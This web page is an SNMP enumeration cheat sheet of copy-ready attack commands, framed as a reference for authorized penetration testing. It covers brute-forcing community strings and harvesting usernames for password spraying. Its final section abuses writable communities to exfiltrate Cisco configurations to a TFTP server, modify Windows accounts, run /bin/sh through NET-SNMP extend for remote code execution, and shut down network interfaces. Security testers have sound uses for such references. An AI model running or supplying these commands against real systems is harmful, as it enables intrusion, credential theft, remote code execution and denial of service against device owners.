SNMP Enumeration Cheat Sheet

SNMP enumeration reference covering snmpwalk, community-string brute forcing, key MIB OIDs, snmp-check, and abusing writable communities to read and modify device configuration. (40 payloads)

Try it interactively with the Nmap Command Builder

Discovery & Community Strings

(7)

nmap -sU -p 161 --open 10.10.10.0/24

Find hosts with the SNMP UDP port open across a subnet — SNMP listens on UDP/161, so a default TCP scan misses it entirelyAlways UDP-scan 161 (and 162 for traps) before assuming a host has no SNMP

onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.10.10.10

Fast UDP community-string brute forcer — sprays a wordlist and prints valid strings with the system description it leakedFastest way to find a working community string; tries hundreds/sec

onesixtyone -i targets.txt -c communities.txt -o found.txt

Brute force community strings across many hosts from a file, logging valid pairs to outputScale community guessing across a whole engagement scope

snmpwalk -v2c -c public 10.10.10.10 1.3.6.1.2.1.1.1.0

One-OID probe of sysDescr to confirm a community string is valid before a full walk — returns the device's OS/firmware bannerpublic (read) and private (read-write) are the classic vendor defaults

hydra -P communities.txt -v target snmp

Brute force community strings with Hydra as an alternative to onesixtyoneUseful when onesixtyone is unavailable; slower but flexible

nmap -sU -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=communities.txt 10.10.10.10

Nmap NSE community-string brute force — convenient when already scanning with Nmapsnmp-brute auto-uses nselib/data/snmpcommunities.lst if no list is given

Common defaults: public, private, manager, cisco, admin, secret, community, write, all, snmpd, default, ILMI

Vendor and product default community strings worth trying first — public is read-only, private/write usually read-writeILMI is a frequent default on ATM/Cisco gear; cable modems often use a serial number

Walking the Tree (snmpwalk)

(7)

snmpwalk -v2c -c public 10.10.10.10

Full subtree walk with SNMPv2c — dumps every readable OID the community can reach. The default starting point of any SNMP enumerationPipe to a file; output can be huge on routers and switches

snmpwalk -v1 -c public 10.10.10.10 .1

Walk the entire tree from the root OID using SNMPv1 — falls back when v2c GETBULK is blocked or the agent is v1-onlyv1 is slower (no GETBULK) but maximally compatible with old gear

snmpbulkwalk -v2c -c public 10.10.10.10

GETBULK-based walk — far faster than snmpwalk on large trees by retrieving many OIDs per requestPrefer bulkwalk on switches/routers to cut walk time drastically

snmpwalk -v2c -c public -Oa 10.10.10.10 1.3.6.1.2.1.25.4.2.1.2

Walk running processes (hrSWRunName) with -Oa to force ASCII output so binary/hex values render as readable strings-Oa avoids the 'Hex-STRING:' formatting that hides readable text

snmpwalk -v2c -c public 10.10.10.10 NET-SNMP-EXTEND-MIB::nsExtendObjects

Enumerate NET-SNMP 'extend' entries — admin-defined scripts whose stdout is exposed (and sometimes triggerable) via SNMPExtend objects can leak command output or enable RCE if writable

snmpwalk -v3 -l authPriv -u admin -a SHA -A authPass -x AES -X privPass 10.10.10.10

SNMPv3 authenticated+encrypted walk once you have a username and auth/priv passphrases — v3 replaces community strings with usersv3 levels: noAuthNoPriv, authNoPriv, authPriv (full security)

Grep a completed walk for credentials — config OIDs frequently leak SNMP/web/SSH passwords in cleartextEmbedded devices store admin passwords in walkable config MIBs

Key MIB OIDs

(8)

1.3.6.1.2.1.1.5.0

sysName — the device hostname. Pairs with sysDescr (1.3.6.1.2.1.1.1.0) and sysContact (1.3.6.1.2.1.1.4.0) for quick fingerprintingThe system. subtree (1.3.6.1.2.1.1) is the fastest target identification

1.3.6.1.4.1.77.1.2.25

Windows user accounts (LanMgr-Mib-2 userTable) — enumerates local usernames on Windows SNMP hosts, gold for password sprayingClassic Windows SNMP leak; feed names straight into spraying

1.3.6.1.2.1.25.4.2.1.2

hrSWRunName — running process names (HOST-RESOURCES-MIB). Reveals AV, EDR, services, and what software to targetPair with 1.3.6.1.2.1.25.4.2.1.4 (hrSWRunPath) for full command lines

1.3.6.1.2.1.25.6.3.1.2

hrSWInstalledName — installed software inventory. Maps the patch level and exploitable third-party apps on the hostBuild a vuln list straight from installed-software versions

1.3.6.1.2.1.6.13.1.3

tcpConnLocalPort — listening TCP ports/connections, equivalent to a remote netstat over SNMPReveals internal services not exposed to your direct scan

1.3.6.1.2.1.25.6.3.1.2 / 1.3.6.1.2.1.4.34.1.3

Software list and IP address table — combine with 1.3.6.1.2.1.4.21.1.1 (ipRouteDest) to map internal routes and pivot targetsThe route/ARP tables expose adjacent subnets for lateral movement

1.3.6.1.2.1.2.2.1.6

ifPhysAddress — interface MAC addresses; with 1.3.6.1.2.1.2.2.1.2 (ifDescr) you get a full interface and adapter inventoryMAC/interface mapping helps fingerprint VMs, NICs, and segments

1.3.6.1.2.1.4.22.1.2

ipNetToMediaPhysAddress — the device ARP cache, listing other live hosts and their MACs on the local segmentFree host discovery for networks you cannot scan directly

Targeted Queries & Reverse Lookups

(6)

snmpget -v2c -c public 10.10.10.10 1.3.6.1.2.1.1.1.0

Fetch a single OID's value — precise queries instead of dumping the whole tree when you already know the OID you wantLower noise than a full walk; ideal for confirming specific values

snmptable -v2c -c public 10.10.10.10 hrSWRunTable

Render a MIB table as a formatted grid (e.g. the process table) instead of raw OID-by-OID outputFar more readable than snmpwalk for tabular MIB objects

snmptranslate -On SNMPv2-MIB::sysDescr.0

Translate a symbolic MIB name to its numeric OID (and -Os reverses it) so you can query without MIB files loadedUse -m ALL or install snmp-mibs-downloader to resolve vendor names

snmpwalk -c public -v1 10.10.10.10 hrSWInstalledName

Walk by symbolic name when MIBs are installed — readable equivalent of the numeric installed-software OIDRequires the relevant MIB; otherwise use the numeric OID

braa [email protected]:.1.3.6.*

Mass, multi-target SNMP scanner — queries many devices/OIDs in parallel far faster than snmpwalk for large rangesbraa [email protected] sweeps a whole /24 quickly

snmpwalk -v2c -c public -Cc 10.10.10.10 .1

Continue walking past OIDs that return errors instead of aborting — survives agents that throw exceptions mid-tree-Cc (do not check increasing OIDs) rescues partial walks

Automated Enumeration (snmp-check)

(6)

snmp-check 10.10.10.10

All-in-one SNMP enumerator — parses the walk into human-readable sections: system info, users, processes, network, storage, software, routingDefault community is public; the single best first-pass tool

snmp-check -c private -v 2c 10.10.10.10

Run snmp-check with a specific community string and SNMP version when public fails or you found a non-default stringSet -v 1 for legacy agents that reject v2c GETBULK

snmp-check 10.10.10.10 | grep -A20 'User accounts'

Pull just the enumerated user-accounts section from snmp-check output to seed a spraying listsnmp-check auto-resolves the Windows user OIDs for you

nmap -sU -p 161 --script snmp-info,snmp-sysdescr,snmp-processes,snmp-win32-users,snmp-netstat 10.10.10.10

Nmap NSE SNMP enumeration scripts — system info, processes, Windows users, and netstat without a separate toolchainAdd snmp-interfaces and snmp-win32-software for fuller coverage

nmap -sU -p 161 --script snmp-win32-services,snmp-win32-shares 10.10.10.10

Enumerate Windows services and SMB shares over SNMP via NSE — maps attack surface without authenticated SMB accessShares and service names often reveal high-value targets

msf6 > use auxiliary/scanner/snmp/snmp_enum

Metasploit SNMP enumeration module — set RHOSTS and COMMUNITY, then run for a structured device dumpPairs with auxiliary/scanner/snmp/snmp_login for brute forcing

Writable Communities & Abuse

(6)

snmpset -v2c -c private 10.10.10.10 1.3.6.1.2.1.1.4.0 s pwned

Write a value to a writable OID — succeeding on a low-risk OID like sysContact proves you have a read-write (RW) communityIf sysContact writes back, the community has write access to more

snmpset -v1 -c private 10.10.10.10 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1

Trigger a Cisco TFTP config exfil (CISCO-CONFIG-COPY-MIB) — with a RW community you can copy running-config to a TFTP server you controlClassic Cisco RW abuse: dump or replace the full device config

snmp_enum_users via 1.3.6.1.4.1.77.1.2.25 then snmpset to add account

On a writable Windows LanMgr MIB, modify the user table — RW SNMP can pivot to host control by altering accounts/configWritable LanMgr OIDs are a path from SNMP to system compromise

snmpset -v2c -c private 10.10.10.10 'nsExtendStatus."command"' = createAndGo nsExtendCommand."command" = /bin/sh ...

Abuse NET-SNMP-EXTEND-MIB with a writable community to register and execute an arbitrary command — full RCE as the snmpd userWritable NET-SNMP extend objects are a direct route to RCE

snmpwalk -v2c -c private 10.10.10.10 1.3.6.1.6.3.16.1.2

Read the VACM access-control table to map which views each community/group can read or write — find the most privileged communityvacmAccessTable reveals exactly how far each community reaches

snmpset -v2c -c private 10.10.10.10 ifAdminStatus.2 i 2

Set an interface admin status to down (2) — demonstrates that a RW community enables denial of service against network linksPowerful proof-of-impact; use only with explicit authorization

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

Post-Exploitation Cheat Sheet Active Directory & Kerberos Cheat Sheet Nmap Scanning Cheatsheet

Frequently asked questions

What is the SNMP Enumeration Cheat Sheet?+

It's a quick-reference collection of 40 SNMP Enum payloads for testing SNMP Enumeration vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these SNMP Enum payloads?+

Copy any payload straight into your authorized test, or use the Nmap Command Builder to apply them interactively. Only test systems you have explicit permission to assess.

Are these SNMP Enum payloads free to use?+

Yes — this cheat sheet and all SNMP Enum payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the SNMP Enumeration Cheat Sheet?+

How do I use these SNMP Enum payloads?+

Copy any payload straight into your authorized test, or use the Nmap Command Builder to apply them interactively. Only test systems you have explicit permission to assess.

Are these SNMP Enum payloads free to use?+

Yes — this cheat sheet and all SNMP Enum payloads are completely free, with no account required. Everything runs in your browser.

SNMP Enumeration Cheat Sheet

Discovery & Community Strings

Walking the Tree (snmpwalk)

Key MIB OIDs

Targeted Queries & Reverse Lookups

Automated Enumeration (snmp-check)

Writable Communities & Abuse

Related Tools

Related Cheat Sheets

Frequently asked questions

SNMP Enumeration Cheat Sheet

Discovery & Community Strings

Walking the Tree (snmpwalk)

Key MIB OIDs

Targeted Queries & Reverse Lookups

Automated Enumeration (snmp-check)

Writable Communities & Abuse

Related Tools

Related Cheat Sheets

Frequently asked questions